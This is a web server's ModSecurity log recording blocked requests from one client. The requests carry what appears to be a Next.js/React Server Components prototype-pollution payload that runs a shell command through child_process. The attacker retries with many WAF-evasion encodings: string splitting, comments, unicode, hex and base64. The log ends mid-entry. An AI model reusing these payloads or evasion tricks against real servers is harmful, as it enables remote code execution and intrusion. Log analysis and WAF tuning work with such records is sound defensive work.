172.94.9.253:47062] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1UI7AjfUQYCN-J7D7QAAANY"] [Sun Apr 05 15:42:45.959956 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:47128] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1bxQSOrq_iRTM7dqxgAAAQc"] [Sun Apr 05 15:42:45.960250 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:47118] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1bxQSOrq_iRTM7dqxwAAAQw"] [Sun Apr 05 15:42:45.960877 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:47130] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1Zc83uMXRUE9zvQTiwAAAcY"] [Sun Apr 05 15:42:45.962353 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:47076] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1bxQSOrq_iRTM7dqyAAAARI"] [Sun Apr 05 15:42:45.962670 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:47092] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dqyQAAAQk"] [Sun Apr 05 15:42:46.062987 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:47168] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dqywAAARA"] [Sun Apr 05 15:42:46.063000 2026] [:error] [pid 1308:tid 1357] [client 172.94.9.253:47192] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1ij-HYEhJWFlG6EriQAAAEw"] [Sun Apr 05 15:42:46.063047 2026] [:error] [pid 13019:tid 13261] [client 172.94.9.253:47216] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dqygAAARU"] [Sun Apr 05 15:42:46.063241 2026] [:error] [pid 1309:tid 1372] [client 172.94.9.253:47176] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1j-XKUNJEHmNu6G7zgAAAIQ"] [Sun Apr 05 15:42:46.063586 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:47156] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1pc83uMXRUE9zvQTjAAAAcw"] [Sun Apr 05 15:42:46.063693 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:47230] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dqzAAAAQM"] [Sun Apr 05 15:42:46.063743 2026] [:error] [pid 23077:tid 23101] [client 172.94.9.253:47142] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1pc83uMXRUE9zvQTjQAAAdI"] [Sun Apr 05 15:42:46.063876 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:47246] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1rxQSOrq_iRTM7dqzQAAAQQ"] [Sun Apr 05 15:42:46.064145 2026] [:error] [pid 22788:tid 22804] [client 172.94.9.253:47220] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1iLbhFL16Wsx-C9DDwAAAY4"] [Sun Apr 05 15:42:46.064352 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:47202] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1rxQSOrq_iRTM7dqzgAAAQY"] [Sun Apr 05 15:42:46.182193 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:47322] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1rxQSOrq_iRTM7dq0AAAAQw"] [Sun Apr 05 15:42:46.182201 2026] [:error] [pid 1503:tid 1514] [client 172.94.9.253:47334] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1kI7AjfUQYCN-J7D7gAAAMU"] [Sun Apr 05 15:42:46.182710 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:47274] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo 